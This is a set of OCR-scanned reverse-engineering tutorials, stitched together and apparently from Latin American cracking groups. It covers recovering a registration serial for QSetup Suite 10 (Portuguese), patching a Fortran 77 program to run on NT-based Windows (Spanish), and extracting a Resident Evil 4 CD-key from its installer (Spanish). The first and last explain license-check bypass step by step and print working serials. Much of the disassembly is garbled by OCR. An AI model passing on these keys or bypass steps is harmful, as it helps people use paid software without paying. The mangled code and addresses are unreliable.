serial e registrar o nosso amiguinho. O 


—Registration 


Acquire registration code through: 


Enter registration code: 


ERROR 


Illegal Registration Code! 


[ Pescando o Serial ] | 


Agora com uma das técnicas mais manjadas da ER vamos chegar lá 
onde a mensagem é criada e entender como é feita essa coisa toda 
para prosseguir-mos com nosso serial. 


Pause [ F2 ] + Execute Till User Code [ ALT + F9 ] 


Após nosso Back-To-User, chegamos nesse endereco: 004A7D55 


CALL 

TEST AL, AL 

Lea CAD DUDA PR ER CEBRZa 
LEA EAX, 


ES F205F6FF CALL JMP to USER32. Trans lateMessage 
8D45 BC 


15] 
ES 2101F6FF CALL Composer. B0407E94 JMP to USER32.DispatchMessageA 
o CMP EYTE PTR O sn?DAR 


56 PUSH ESI 

ES E2F9FSFF CALL Composer. 50407764 JMP to kernel32.FreeLibrary 
8B1D 40375908 |MOU EBx, DWORD PTR DS: [598740] 
3300 OR EAX, EAX 


POP ECX 

POP ECX 

MOU DWORD PTR FS: [EAX],EDX 
PUSH 


64:8910 
68 B27D4A00 
8D45 F3 
BA 02000000 
ES SECEFSFF 


8D45 10 
ES 42CEFSFF 
c3 


Vamos brekar nesse RET e rodar o programa, após vamos tracando 
com F8 até chegarmos após a CALL da mensagem de erro. 
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Tutorial de como Pescar Serial para QSetup Suite 10 


Esse é o ponto de retorno, entáo, nessa CALL acima é onde e gerada 
a mensagem de erro e chamada nossa MessageBox. 


3300 
ES CEA7F2FF 
EB 51 


X0R EAX, ERAX 
TEST _AL,AL 


3300 
ES DSD4F4FF 
2400 


3040 FO 
BA DS6D5700 EDXx ASCII "You must have ADMINISTRATOR rights 
B3 106E5700 ASCII "GMain_07” 


ES _7BCAFEFF 
2855 FO MOU EDX, 
3309 XOR ECx,ECX 


3300 XOR EAX, EAX 
ES 9FA7F2FF 

EB 22 

5A Un 
2D4D EC 

BA 246E5700 ASCII "Error Registering Gsetupt” 


B3 486E5700 ASCII "GMain_08 
ES _S7CAFEFF 


3300 
ES 7TBA?F2FF 
MOU EAX,ESI 


S8BC6 
Es Fozseo0a__ | CALL Composer. 00579524 


Entáo vamos subir até o PUSH EBP [ eu sempre breko nele ] e 
vamos rodar novamente com nosso serial falso. 


Ao tracar entraremos nessa CALL, pois nela existe algumas 
validacóes muito interessante pra nossa missáo. O 


[D0572Ac5]”864 MOU ERA 
TT E A FE Epiepser.dosearÑl | 
[as c6AniL.54ce AL 


Dentro da CALL já comeca a se destacar algumas partes, deixei 
comentada pra ficar mais fácil a visualizacáo. Podemos notar que ele 
compara o serial digitado com 16 em decimal, se for 16 os dígitos ele 
compara se o primeiro char é quatro se for ele passa pra verificacáo 
dos quatro últimos dígitos. 


38B45 FC 
ES 224 7FBFF 
83F3 16 Compara com 160 [ 16 em decimal 1] 


Compara se o primeiro char eh 4 


Verifica os quatro ultimos chars 


Smasósm 
mozozm 
< MN<TDDI 
D 
Xx 


3B45 FC 
ES_1BFAFFFF 
3400 

75 28 
3B45_FC 

ES _27FBFFFF 
3400 

Y5 1c 

3B45 FC 

ES _33FCFFFF 
3400 

Ys 16 

3B45 FC 

ES _EBFDFFFF 
3400 


pa 
| 
D 
P 
D 
P 


z 
o 
12 
m 
D 
Xx 


HOZ A 

mxo zm 

NEAR 

pá pa 
m 

DIv 

xDr 

D 

n 


8 
o 


Sn 
m 
10] 
D 
FP 
D 
P 


EAX, EAX 
OU AL, 1 


z 


36 
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NOTA .: É interessante observar que o software segue a validacáo de trás pra 
frente, ele verifica se os quatro últimos dígitos sáo validos de acordo com os 
quatro penúltimos dígitos, caso sejam ele passa. 


Após isso, ele verifica se os quatro penúltimos estáo de acordo com as categorias 
Lite, Studio ou Pro / o nosso amigo FireDuck testou o software e viu que O 
serial pra versáo Pro é a mesma para Pro / MSI ] e se náo corresponderem ele da 
erro. 


Interessante náo? Vamos fazer um resuminho entáo! 

1 - Ele tem 16 caracteres decimais? 

2 - Comeca com o número quatro ? 

3 - A validacáo dos quatro últimos é correspondente aos quatro penúltimos? 
4 - Os 4 penúltimos estáo entre as categorias Lite, Studio ou Pro? 


Caso sim, software registrado com sucesso! O 


Após inventar um serial com 16 caracteres e comecando com a letra 
quatro entáo ¡rei entrar na CALL para verificar esses quatro dígitos e 
logo já posso ver que estáo errados. =/ 


ES CCFEFFFF 
SBSS FO 


8645 F4 
ES CIS2FOFF 
aF94C3 
rack OSiTOI2FS1OIDOETZ IO. (ASCII "1269" 
EDX=00E45190, (ASCIN "423456789000") 


Bom, sabendo disso eu já iniciei novamente com o final do meu serial 
correspondente, é claro. ;D 


Vou mostrar como buscar um serial pro profissional, porém segue a 
mesma regra para todos os outros em questáo. 


Como meus quatro últimos dígitos estáo corretos eu passo na 
primara verificacáo, porém logo dará erro. O que tenho que fazer e, 
dar ENTER e entrar na CALL do PRO, assim eu vejo como sáo os 
quatro penúltimos dígitos e insiro novamente no programa, ele vai 
dar erro, porém agora eu sei que tenho que entrar na CALL pra 
verificar os quatro últimos dígitos e certeza que agora estaráo 
certinhos, fazendo assim nosso programa ser Registrado com 
Sucesso. 


Tutorial de como Pescar Serial para QSetup Suite 10 


Entro na CALL do PRO e pego um número de lá qualquer, vou pegar o 
primeiro mesmo, 1310 para economizar tempo. 


BA ÉCOSS00a ASCII »1310" 
75 B2 


E3 Bl 

8D45 Fa 

50 

E9 B4009009 
BA aB900BBBa 
28B45 FC 

ES 7F4CFOFF 
3B45 Fa 

BA 7CO5500a ASCII "1410" 
ES SE4BFOFF — 
75 B2 


50 
B9 04000090 
EA B900BBBa 


8845 FC 
ES S84CFOFF 
8845 EC 

BA SCOSS500n ASCII "2310" 
75 02 

MOU BL, 1 

LEA EAX, DWORD PTR-SS: [EBP=18] 


50 
E9 64000000 
BA 4900000B 


8B45 FC 

ES 314CFOFF 

BA 9CO5500B ASCII "2410" 
2 164BFA AAAAáÁAÁAÁAAAAAXS 


Entáo agora temos o seguinte serial de teste. 


—Registration 


Acquire registration code through: vana pantaray. com 


Enter registration code: [a234567813101269 


Que segue o padráo, comeca com quatro, tem 16 caracteres e os 
quatro penúltimos caracteres estáo de acordo com o serial PRO, 
agora falta ver os quatro últimos para finalizar nosso serial. 


Entramos na CALL que faz a verificacáo dos quatro últimos e olha que 
maravilha: 


S8B55 FA 

3B45 F4 

Es C152FBFF 

F94C03 

an XOR EAX, EAX 
BB4FFO3C POP EDX 
B04FFO3D POP ECXx 
BB4FFO3SE 59 POP ECX 


OB4FFD3F| 64:8910 MOU DWORD _PTR FS: CEAX],EDX 
BB4FFD 68 SCFD4F : 


Stack S5: [0612F610]= II "2055") 
EDxX=500E447FC, (ASCII "9 ps 


ABE1SA1AB|AS 
ABE12F10 


ABDSGOFA 
BBE447FC 
ABE44B1C| ASC 
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Tutorial de como Pescar Serial para QSetup Suite 10 
[ Testando! ] 


Já vimos como deve ser o serial final entáo vamos testar? 


—Registration 


Acquire registration code through: va, pantaray.corm 


Enter registration code: faz34567813102055 
Registered Copy (PRO) 


Congratulations 


Q5etup PRO Registered OK! 


Congratulations! 
Serial correto e rotina desmistificada. 


[ Finalizacáo! ] 


Podemos notar que náo houve dificuldade alguma nesse software, é 
bem simples a forma de validacáo do mesmo e para efetuar o 
entendimento completo, necessitava apenas de um pouco de 
paciéncia e atencáo aos pequenos detalhes. 


É isso ai gente, mais um tutorialzinho meu, fiquei muito tempo se 
escrever nada, porém espero poder voltar a escrever tutorialz pra 
passar pra todos um pouco do que aprendi nesse tempo de ER. 


Grande abraco e beijinhos para a escola do BRC, os amigos de 
jornada do CTB, o pessoal do ARTeam pelo ótimo trabalho e outros 
grandes grupos de ER por esse mundo a fora. 


Obrigado! 


unn4m3D_BR - CTB [ 2069 ] 


Rio de Janeiro 
04/07/2009 
19:45 PM 
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Introducción 


Hola a todos. 


En esta entrega vamos a realizar ingeniería inversa pura y dura. Tenemos un 
programa compilado en Fortran 77, es un Fortran para Windows el cual no arranca en 
sistemas operativos NT como por ejemplo Window 2000, WinXP o Vista. 


Buscando en la red he visto que este fallo es común en programas antiguos 
hechos en Fortran así que me he decido a realizar este tutorial por si puede ayudar a 
alguien más. 


En este caso el problema está en el propio Fortran, el cual para la petición de 
memoria, movimiento de zonas de memoria, ... usa APIS no documentadas de la 
ntdll.dll. Precisamente esas APIs han cambiado de nombre en las nuevas versiones de 


los sistemas operativos Windows y esta es una de las causas por la cual el programa no 
funciona. 


Las herramientas usadas en este tutorial han sido: 

- — OIlyDBG, personalmente uso una de las versiones de SND 
- IDAPRO 5.2 versión 32 bits 

- LordPE 

-  MSDN bien OnLine, bien instadados en su PC. 


Manos a la obra. 


Reparando la importación 


Si intentamos arrancar el programa nos encontramos con un cartelito como este: 


- No se encuentra el punto de entrada E | 


Q No se encuentra el punto de entrada del procedimiento RtlExAllocateHeap en la biblioteca de vínculos dinámicos ntdll. dll. 


Acto seguido lo siguiente que hago es buscar esa API en el MSDN y evidentemente no 
la encuentro pero si esta: 


RtlAllocateHeap 
¿Curioso verdad? Enseguida se me viene a la cabeza APIs como VirtualAlloc o 


VirtualAllocEx cuya diferencia es que VirtualAllocEx recibe entre sus argumentos un 
Handle del proceso. 


LPVOID VirtualAlloc( 
LPVOID IpAddress, // address of region to reserve or commit 
DWORD dwsSize, // size of region 
DWORD flAllocationType, // type of allocation 
DWORD flProtect // type of access protection 
); 


LPVOID VirtualAllocEx( 


HANDLE hProcess, // process within which to allocate memory 
LPVOID IpAddress, // desired starting address of allocation 
DWORD dwSize, // size, in bytes, of region to allocate 
DWORD flAllocationType, // type of allocation 

DWORD flProtect // type of access protection 

); 


Curiosamente en este caso si hProcess es O se comporta igual que VirtualAlloc. Asi que 
en principio me esperaba algo así que con unos cuantos NOP bien puesto se podría 
arreglar, pero veamos que la cosa fue un poco más simple. 


La API que tenemos en nuestro WinXP es la siguiente RtlAllocateHeap que según el 
MSDN 


PVOID RtlAllocateHeap ( 
IN PVOID HeapHandle, 
IN ULONG Flags, 
IN SIZE_T Size 


); 
Por desgracia no pude encontrar la declaración de RtlExAllocateHeap, y como no puedo 
cargarlo en el depurador porque la sección Import es incorrecta veamos que nos dice el 


IDA PRO. 


Abrimos el IDA, cargamos el programa y seleccionamos la pestaña Import 


=] IDA ViewA | [3] Hex View | Ey Esports Imports N Names | Ya Functions | K Stru 


Address Ordinal. Name Library 

ER 00034180 SetHandleCount KERNEL32 
ER 00034184 CreateFileó, KERNEL32 
[Eta 00034188 SetErrorMode KERNEL32 
[Eta 00034188 MoveFileó, KERNEL32 
[Et 00034190 FileTimeT oLocalFileTime KERNEL32 
EER 00034194 GetStdHandle KERNEL32 
ER 00034198 SetFilePointer KERNEL32 
$2 00034140 RilExállocateHeap ntdll 


E 00034144 NtCurrentT eb ntdll 
[Et 00034148 RtlExFreeHeap ntdll 
[Et 000341... RtlExSizeHeap ntdll 
ER 00034180 AtlUnwind ntdl 
ER 000341B4 RtlExReállocateHeap ntdll 


Buscamos nuestra API y le damos doble click a ver donde nos lleva 


data: 09034149 extrn Dimp RETEXATLOcateHeap :duord 
.data: 00034140 5 DATA XREF: RtlExAllocateHeapTr 


data:00034194 ; struct TEB *NtCurrentTeb(void) 


Hacemos doble click en la zona que he remarcado 


Rt1ExAllocateHeap proc near ¡| CODE XREF: sub_1E460+1A1Tp 


jmp ds: imp RtlExfAllocateHeap 
Rt1ExAllocateHeap endp jnz 


Vemos que se llama desde un único sito pinchemos en la zona recuadrada 


mou esi, 1 
loc_1E471: 5 CODI 
5 sub 
push esi 
push 5 


push ds:dword_2EB24 
Call Rt1ExAllocateHeap 


Pues aquí lo tenemos, parece que RtlExAllocateHeap también usa 3 parámetros. 
Llegamos a este punto realizamos una copia con otro nombre del programa en cuestión 


y dejamos este abierto con en el IDA. La copia del programa la abrimos con LordPE 
para modificar la sección de Importación. 


[ ImportTable ] 


DilName | DriginalFirstThunk  TimeDateStamp | ForwarderChain Name FirstThu 
KERNEL32. dll 00024030 00000000 00000000 00024484 000240F 
ntdll. ll 0002400 00000000 00000000 000244F8 000241: 


ThunkAYA4 | ThunkOffset ThunkYalue  Hint _ApiName o ' 
0002400 0001640 00024492 013E RitlExállocateHeap 

000240E 4 000164E 4 00024446 00 NiCurentT eb 

000240E8 MOE [ Edit Thunk ] 
D00240EC 000164EC Soo oa a y 


000240F0—— O0O164FO A A | 
000240F4 000164F4 ThunkWalue: | 00024492 
Cancel | 


Hi HE 
ApiN ame: RtlállocateHeap 


Number Of Thunks: 6h * 6d (O By 
Una vez seleccionada la dll buscamos las APIs problemáticas y las editamos. 
Los cambios son: 

En ApiName simplemente le quitamos el Ex 

En Hint lo dejamos vacío. 
Para el que no lo sepa el Hint es el dato a buscar cuando se carga la API por ordinal y 
no por nombre, como sabemos el nombre de la APT a poner pero no su ordinal 
simplemente borramos ese dato. 


Tras el retoque la importación queda así: 


ThurkRVA | ThunkOffset | ThunkValue | Hint__ | ApiName 
0002400 O0O164€0 00024492 — [0000 AtlállocateHeap 
0002404 O0O164E4 00024446 0053  NtCumentTeb 
000240E8 — 0O00164€8 00024486 [0000 AtiFreeHeap 
D00240EC ODOT64EC  000244C6  |0000 AtiSizeHeap 


000240F0 000164F0 000244D6 01E1 RtlUrwwind 
D00240F4 000164F4 000244E 2 0000 RitiReállocateHeap 


Number Of Thunks: Bh + 6d (DriginalFirstT hunk chain] O View always FirstT hunk 


Salvamos todo y lo intentamos ejecutar a ver si tenemos suerte. 


dwwin.exe - Error de aplicación x 


(Xx) Se ha producido la excepción unknown software exception (0x3D000003) en la dirección Ox7d61002d, 


Haga clic en Aceptar para finalizar este programa 
Haga clic en CANCELAR para depurar el programa 


Vemos que no, pero por lo meno parece que ya carga. 


Parcheando Actualizando Estructuras de Windows 


Añadamos el programa a OllyDBG y vamos comparando que vemos con lo que nos 
muestra IDA PRO 


Estamos en el EP y si miramos un poco con la rueda vemos esto 


Los primeros call que estan recuadrados son en los que Fortran obtiene datos como por 
ejemplo, número de argumentos, punteros a los argumentos, las variables del 
Enviroment, ... 


Y el call que está recuadrado solo sería la llamada a la función main tipica de C que en 
Fortran no se como se llamaría, pero para entendernos todo la parafernalia hasta llegar a 
ese Cal no es más que inicializaciones que hace Fortran y donde nos encontramos el 
problema. 


Veamos un poco las notas que tengo ya en IDA 


mou dword_31C84, edx ; Hasta aqui va tomando datos 
para ver la version de Windows 
Devuelve el puntero a la estructura Heaps 
del proceso usando el TEB y el PEB 
Función que toma los Standares de: 
- Entrada (teclado) 
- Salida (Pantalla) 
- Error (Suele ser pantalla) 
Copia el Numero de argumentos pasados 
en la variable global NumeroDeArgumentos 


Call GetProcessHeap 


El problema call GetStdHandles 


call sub_22928 


-.. mn un so 


Copia el string de ComandLine en la variable 
global PArgumentos 

Lee las variables indicadas en el Enviroment 
y aloja una lista de punteros a las variables 
en la variable global ListaPunteroEnviroment 
Inicializa algo ¿? al estilo de Borland 


call sub_22858 


.. .. uu. us. 


call sub_1E7D6 


mou [ebp+var_1C], 6 

push ListaPunteroEnviorment ; puntero a una lista de puntero a cada u 
5 indicada por pEnviroment 

push PArgumentos 

push NumeroDeArgumentos 

Call sub_17000 5 El programa en si 


Antes de analizar la call remarcada en el Olly sería CALL 0001E.C40 veamos la 1? call 
que he llamado GetProcessHeap 


.text:00021FA0 GetProcessHeap proc near CODE XREF: start+D2jJp 


.text:00021FA0 call NtCurrentTeb 

.text:00021FA5 mou eax, [eax+30h] ; eax = Puntero a PEB 
.text:00021FA8 mou eax, [eax+18h] ; eax puntero a Heaps 
.text:00021FAB mou ds:dword_2EB24, eax 

.text:00021FB0 retn 


.text:00021FB0 GetProcessHeap endp 


Esta función es la que se encarga de obtener el puntero a la estructura de los Heaps del 
programa para ir pidiendo, moviendo, borrando memoria. 


En vez de crear un Heap lo que hace es llamar a la APT NTCurrenTeb de la ntdll.dil. 
Esta API devuelve la dirección TEB del programa, luego toma el puntero a PEB y de la 
estructura PEB toma dirección de la estructura Heaps que la guarda en una variable 
global. 


Ante este tipo de cosas pues es normal que con el cambio de SO los programas dejen de 
funcionar por no usar las APIs de alto nivel que ofrece Windows las cuales no han 
variado, al menos en su nombre y número de parámetros la verdad que un 0 para los 
desarrolladores del compilador de Fortran 6 


Bueno sigamos con la call problemática, la que en IDA le di el nombre de 
GetStdHandles 


Esta función se encarga de obtener los Handles al stdin, stdout y stderr 
En cristiano: 

- — stdin: Estandar de entrada, tipicamente el teclado 

- — stdout: Estandar de salida tipicamente la pantalla 

-  stderr: Estandar de error, tipicamente la pantalla 


Vemos un estracto de la función según IDA 
proc near 5 CODE XREF: start+D7jp 


text: 8901EC48 GetStdHandles 


.text:0001EC40 


.text:9001EC408 Startupinfo 


«text: 0001EC40 


_STARTUPINFOA ptr -3Ch 


.text:0001EC408 push ebp 

«text: 8001EC41 mou ebp, esp 

.text:0001EC43 sub esp, 3Ch 

«text: 9001EC46 push esi 

«text: 0001EC47 push edi 

«text: 0001EC48 lea eax, [ebp+Startupinfo] 
.text:0001ECA4B push eax 5 1pStartupinfo 
«Text: 9001ECAC Call GetStartupInfoA 

.text:0001EC51 cmp [ebp+StartupInfo.lpReservued2], 8 
«text: 0001EC55 jz short loc_1ECAE 

«text: 0001EC57 lea edi, [ebp+StartupInfo.hStdInput] 
«text: 0001EC5A mou esi, [ebp+StartupInfo.l1pReserved2] 
«text: 6091EC5D mousd 

«text: 0001EC5E mou edx, [ebp+StartupIinfo.hStdInput] 
.text:0001EC61 mou eax, 46h 

.text:0001EC66 cmp edx, eax 

.text :8001EC68 jl short loc_1EC6€ 

.text: 0001ECÓA mou edx, eax 


Parece que solo tiene una variable global y es la que se usa obtener los datos del 
encendido del proceso aunque lo veremos en Olly lo más importante es ese -3Ch, ahora 
lo veremos. 


Estamos parados en el PUSH EBP, veamos la PILA 


Es decir en la posición 15FF88 tenemos la dirección de retorno, la cual no se puede 
pisar sin la liamos. 


Pues vamos ejecutando con F8 paso a paso y nos paramos en la dirección 1EC51, es 
decir justo después de la call GetStartupInfoA y vemos la pila 


Pues el valor se está machacando y ¿eso porque? 
Vemos la estructura STARTUPINFO 


typedef struct _STARTUPINEO ( // si 
DWORD cb; 
LPTSTR — IpReserved; 
LPTSTR — IpDesktop; 
LPTSTR — IpTitle; 
DWORD  dwX; 
DWORD  dwY; 
DWORD  dwXSize; 
DWORD  dwYSize; 
DWORD  dwXCountChars; 
DWORD  dwYCountChars; 
DWORD  dwrFillAttribute; 
DWORD  dwrFlags; 
WORD wShowWindow; 
WORD cbReserved2; 
LPBYTE — IpReserved2; 
HANDLE — hStdInput; 
HANDLE — hStdOutput; 
HANDLE  hStdError; 


) STARTUPINFO, *LPSTARTUPINFO; 

Según la información de MSDN la variable cb tiene el tamaño en Byte de la estructura y 
según lo que vemos en la pila este dato se encuentra en 0015FF48 y tiene un valor de 
44h 


Si recordamos, en el principio de la función tenemos 


PUSH EBP 
MOV EBP,ESP 


SUB ESP,3C 


El Sub ESP,3C lo que está haciendo es reservar espacio para las variables locales de la 
función, que en este caso como vimos en el IDA solo tenemos la estructura, por lo que 
tendremos que cambiar el 3C por el 44 que hemos visto en el OLLY 


¿Y este cambio porqué? Bueno se ve que los de Microsoft en un momento dado 
ampliaron la estructura y añadieron más campos. Actualmente este tipo de cosas sigue 
pasando pero lo han mejorado ya que antes de llamar a las APIs que rellenan las 
estructuras es obligatorio indicar el tamaño que hemos reservado para ellas, de esta 
forma los de Microsoft saben si usar la estructura antigua O la nueva, en este caso se 
olvidaron de la compatibilidad hacia atrás y se jode todo. 


¿Y con ese cambio que hemos hecho ya está todo? 


Pues va a ser que no, con cambiar el SUB ESP,3C por SUB ESP,44 hacemos que no se 
desborde la pila pero como vemos en IDA en esta función se hace uso de los campos de 
la estructura y al ampliar la estructura los Offset que utilizan son incorrectos y hay que 
actualizarlos. 


text: 0001EC4C Call GetStartupInfoA 

text: 8091E051 cmp [ebp+StartupInfo.[IpResprued2], 0 
text:0001EC55 jz short loc_1ECAE 

text: B8091EC57 lea edi, dei ETE 
text: 0001EC5A mou esi, [ebp+StartupInfo| ] 


Los cambios para mantener bien los punteros, según nos indica IDA, son los siguientes 


Con estos cambios conseguimos hacer andar el programa. 


Como dije al inicio del tutorial esto no se puede optimizar sobre todo porque al igual 
que se ha detectado una estructura que ha cambiado al evolucionar el SO, esto mismo 
podría pasar dentro del “código del programador” y no en la “cabecera” que nos crea 
Fortran al compilar el ejecutable. En este caso el programa lo que hace es leer unos 
ficheros para generar otros, nada visual y por eso hemos terminado rápido, con otros 
programas igual los parches son más profundos. 


Espero que haya quedado claro los pasos que hemos realizado en esta aventurilla en el 
que hemos vuelto a hacer funcionar un programa un poco viejito pero vital para mi 


padre en su curro 


Saludos a todos los miembros de CracksLatinos 


(GUÍAN DIS BNO: 


, 
0] 


Resident Evil 4 — Un Installshield 


4 Programa 
4 Versión 


>) Herramientas Ollydgb 
Microsoft Visual C++ 
Sacar un número de serie válido 


Noukeys reverser. 


Bueno, voy a explicar como he conseguido instalar un juego sin tener a 
mano un número de serie. 


Este es el aspecto inicial del juego y de su posterior instalación, estamos 
atascados en el paso del número de serie porque no disponemos de ninguno. 


HA bionazara 4 


'hazard 4 - InstallShield Wizard 


nter CD-Key 
Validate CD-Key 


Enter CD-Key 


Install j 
Readme i 


<Back [_New> ] [ Cancel 


(OQ CAPCOM CO., LTD. 2005, 2006 ALL RIGHTS RESERVED 


Bueno, sabemos que es un instalador y que los instaladores descomprimen sus 
datos en memoria, luego lo primero que hago es cargar el install.exe en ollydbg 
y colocar un BP en la API CreateFileA; 


NY to CreateFileA from ins UTE BB4B76C? 


b612ED4C ame = "Ci oDOCUME” 1>5ADMINIF15CONFIG" 15 Temp insD4, tmp” 
6612EDS0 a. = Bb 
06012ED54 Ss de = FILE_SHARE_READ 
0012EDS3 pSecurity = NULL 
12ED5C Mo de = OPEN_EXISTING 
60012ED60 Attributes = DELETE_ON_CLOSE 
6612ED64 hTemplateF ile = NULL 


farat SEMEO 


Como podemos ver nos esta creando una serie de ficheros en la carpeta 
temporal de windows, vamos a ver que es todo eso. Nos fijamos en el fichero 
que nos ha creado insD4.tmp, si lo editamos con un editor hexadecimal vemos 
esto en el inicio. 


run in DOS 
mode....$....... A....ix..ix..ix.jvr..ix..uv..ix..Jd..ix.6K]..ix..iy..ix..Ja..iX..JS..iX..0”..iX.Ri 


Una cabecera PE, nos interesa el archivo, lo guardamos en una carpeta auxiliar 
y lo renombramos a .exe, quedaría con el siguiente aspecto. 


insD4, exe 
1 ación 
119 KB 


Bueno, vamos por el buen camino, pero si intentamos ejecutarlo, vemos que no 
podemos; esto es sencillamente porque no pasamos los parámetros 
acecuados. ¿Qué cuales son?, seguimos depurando nada más salir de la API 
CreateFile y vemos que nos monta la siguiente cadena: 


lea roo 40 
push ea pProcessInfo 
lea ear, Llene 671] 
push eax pStartuplnfo 
push ebx CurrentDir 
push ebx pEnvironment 
push ebx CreationF lags 
push ebx InheritHandles 
push ebx 23 r 
push ebx ) rita 
push [local.71 CommandLine CD 
ush ebx Modu leFi leName 
call duord ptr ds: [<6KERNEL3Z. CreateProl CreateProcessA 
Stack ss: [0012F3781=009020ES, (ASCII ”C:DOCUME” 1%ADMINI"15»CONFIG” 1i5TemprinsD4.tmp -deleter —your_launcherinstall.exe -clone_init_of”G:w”) 


No se lee bien, pero pone esto: 


Stack ss:[0012F378]=009020E8, (ASCII "CADOCUME-=1MNADMINI=ACONFIG=11TemplinsD4.tmp -deleter - 
your_launcherinstall.exe -clone_init_of"G1"") 


Bueno, llama a CreateProcessA, con esos parámetros, luego que pasara si 
abrimos el ejecutable que hemos sacado de la carpeta temporal con los 
mismos parámetros. ¿?¿? Creo un acceso directo, le añado la cadena de 
parámetros y vemos esto. 


biohazard 4 - InstallShield Wizard [mer biohazard 4 - InstallShield Wizard ll Xx 


Enter CD-Key .. 
Validate CD-Key 


Enter CD-Key 


Welcome to the InstallShield Wizard for 
biohazard 4 


The InstallShield Wizard will install biohazard 4 on your 
computer. To continue, click Next 


sana] aña álaaa) (incio) 


Bueno, parece que vamos muy bien. A partir de ahora es donde me han 
empezado a salir los problemas, pero buaaa, nada que no podamos solucionar 
O. 


Si abrimos el proceso con Olly pasando los argumentos, no funciona, 
¿solución?, tenemos una opción estupenda que se llama atach O; atacheamos 
el proceso y ya es nuestro. Bueno, vamos a ver que pasa si pongo un numero 
de serie aleatorio, por ejemplo el 989898 que seguro que no lo ha puesto 
nunca nadie jejejeje. 


biohazard 4 - InstallShield Wizard 


Enter CD-Key 
Walidate CD-Key 


Enter CD-Key 


biohazard 4 - InstallShield Wizard 


383038 


A Invalid key, please check the key and type it im again. 


| <Back [Enexto 3] | Cancel | 


Nada, nos dice que no es correcto, que por favor, la introduzcamos otra vez. 


Bueno, tiene pinta de MessageBoxaA, así que vamos a poner un BP en esa API, 
y a ver lo que pasa. 


biohazard 4 - InstaliShield Wizard 


Enter CD-Key 
Walidate CD-Key 


Enter CD-Key 


biohazard 4 - InstallIShield Wizard 
989898 


A Invalid key, please check the key and type it in again. 


| Cancel | 


Oooo, no ha parado; no hay problema, hay programitas que detectan los BP en 
el inico de las APIS así que nosotros lo ponemos al final Y y a ver si ahora si 
para. 


((UDUDUE] —SBFE mov edl,edl 
Y7DSOSBD h ebp 


8BEC mov ebp, esp 
833D 10040777 tomp dword ptr ds: [77D07041C],0 


74 24 
64:A1 18000000 PO ante ROTO ptr fs:[18] 
us! 


ES 


pi 

FF7O 24 push dword ptr ds: leax+24] 
68 F4OAD?7? ush USER32.77D70AF4 
FF1S 13120177 kernel32. Inter lockedCompareExchange 
8500 test eax,eax 

v 75 BA 
C705 FABAD??7 (mov dword ptr ds: [77D070AF01,1 
69 90 push 
FF7S 14 push dword ptr ss: [ebp+14] 
FF75 10 push dword ptr ss: [ebp+10] 
FF75 6C push dword ptr ss: [ebp+C] 
FF7S 08 ush dword ptr ss: [lebp+8] 
Es 20000000 


2 1000 Peto 18 
Perfecto, estamos parados en el retorno del mensaje, y muy muy cerca de 
nuestro objetivo. Vamos a salir de la función y a hacer un poco de Zen 
Cracking; a ver por donde caemos OU. 


Fijaros que estamos en un modulo llamado “iscript” que se encuentra en la ruta: 


CArchivos de programalArchivos comunesiInstallShield ProfessionalRunTimeM 1100Untel32Wiscript. dll 


Esto es muy interesante porque significa que hecho uno hechos todos O así 
que ya tenemos una buena motivación para seguir. 


Bueno, vamos a poner un BP en el inicio de la función en la que nos 
econtramos. Quedaría tal que así: 


DULI+TIOHMO LE ULUO 
SERA ss push ebp 


2] SBEC mov ebp, esp 

a S1EC 3838000999 |sub esp,88 

a 53 push ebx 

a 56 push esi 

al 57? push edi 

a 898D ?CFFFFFF |¡mov dword ptr ss: lebp-84],e0x 
a 8B45 10 mov eax,dword ptr ss: [ebp+10] 


38B40 us mov eax,dword ptr ds: [eax+8] 
mov dword ptr ss: [ebp-7C1,eax 
mov ea, dword ptr ss: lebp-7C] 
sub ean,4 

mov dword ptr ss: [ebp-8],eax 
mov eax,dword ptr ss:[ebp+10] 
cmp dword ptr ds:[eax+4],0 


and dword ptr ss:[ebp-881,0 


al 


mov eax,dword ptr ss: [ebp+10] 
mov ecx,dword ptr ss: [ebp+10] 
mov eax,dword ptr ds: l[eax+8] 
sub ea, dword ptr ds: lecx+4] 
B2 sar eaxn,2 

TSFFFFFF [mov dword ptr ss: [ebp-881,ea3x 
S8B35 ?SFFFFFF |¡mov eax,dword ptr ss: [ebp-88] 
8945 FC mov dword ptr ss: [ebo-41].eax 


4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
14 
B14 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 
4 


Y ahora si ejecutamos [F9..F9..F9..F9..] vemos que va parando el proceso y 
que en la pila mete una serie de funciones. Muchas muchas, bueno pues 
vamos a dejar que corra, meter nuestro número de serie y a ver que pasa. 


SS B1437C48| RETURN to iscript.B1437C048 from iscript.614334AB 
1515) 5304 
ETA 02161000 setup_su.SerialCheck 
1515) 305 
91403618 


6061153DC 


¿Qué estoy viendo?, ¿Esta parado con un argumento en la pila que se llama 
setup_su.SerialCheck? Oooo si, estamos en la zona HOT HOT HOT O vamos 
a entrar en la funcion a ver que pasa por hay dentro, jejejeje. 


S83EC 14 sub esp, 14 

62161003 3309 HOr eCxX,ecH 

a2 AB 12403802 mov al,byte ptr ds: [23B4D18] 
394024 61 mov dword ptr ss:[esp+1],ecx 
53 push ebx 

9216100F 334C24 B9 mov dword ptr ss: lesp+9],ecx 


Ese es el inicio de la función que chequea el número de serie. Vamos a ver que 
va pasando O 


Registers (FPU) 


Bueno, más adelante veo esto. 


Registers (FPU) Ls 
EAX BO044BB13 

ECX 6MB115204 

EDX B011532A 

EBX B143DA62 

ESP BB1152EC 

EBP B1651228 ASCII "989898" 

ESI BB115318 ASCII "bh82-2206-9111-1115” 
EDI B21670E4 setup_su.B2167DE4 


EIP 021610EC setup_su. B21618EC 
CO ES 0023 32bit OLFFFFFFFF) 
A REED! 


an nm 


¿Será el mismo serial con formato? — Oooo siii, vamos a probar a ver que pasa 
O 


Nos pide un número de serie y metemos: 


bh82-2206-9111-1115 


E 3 I eS biohazard 4 - InstallShield Wizard 
biohazard 4 - InstallShield Wizard ( == 


Enter CD-Key < 
Validate CD-Key | 


Choose Destination Location 
Select folder where setup will install files. 


Enter CD-Key Setup will install biohazard 4 in the following folder. 
To install to this folder, click Next. To install to a different folder, click Browse and select 
another folder. 


bh82-2206-9111-1115 


Destination Folder 


C:árchivos de programaCAPCOMtbiohazard 4 Browse... 


Gas] Coar O a 


Nos deja pasar, si esque somos chicos buenos :D jejejeje, bueno, pero, porque 
comparaba con mi serial sin formatear, ¿acaso el formato que aplica no vale 
para nada? Vamos a probar. Volvemos atrás. 


Nos pide un número de serie y metemos: 


bh82220691111115 


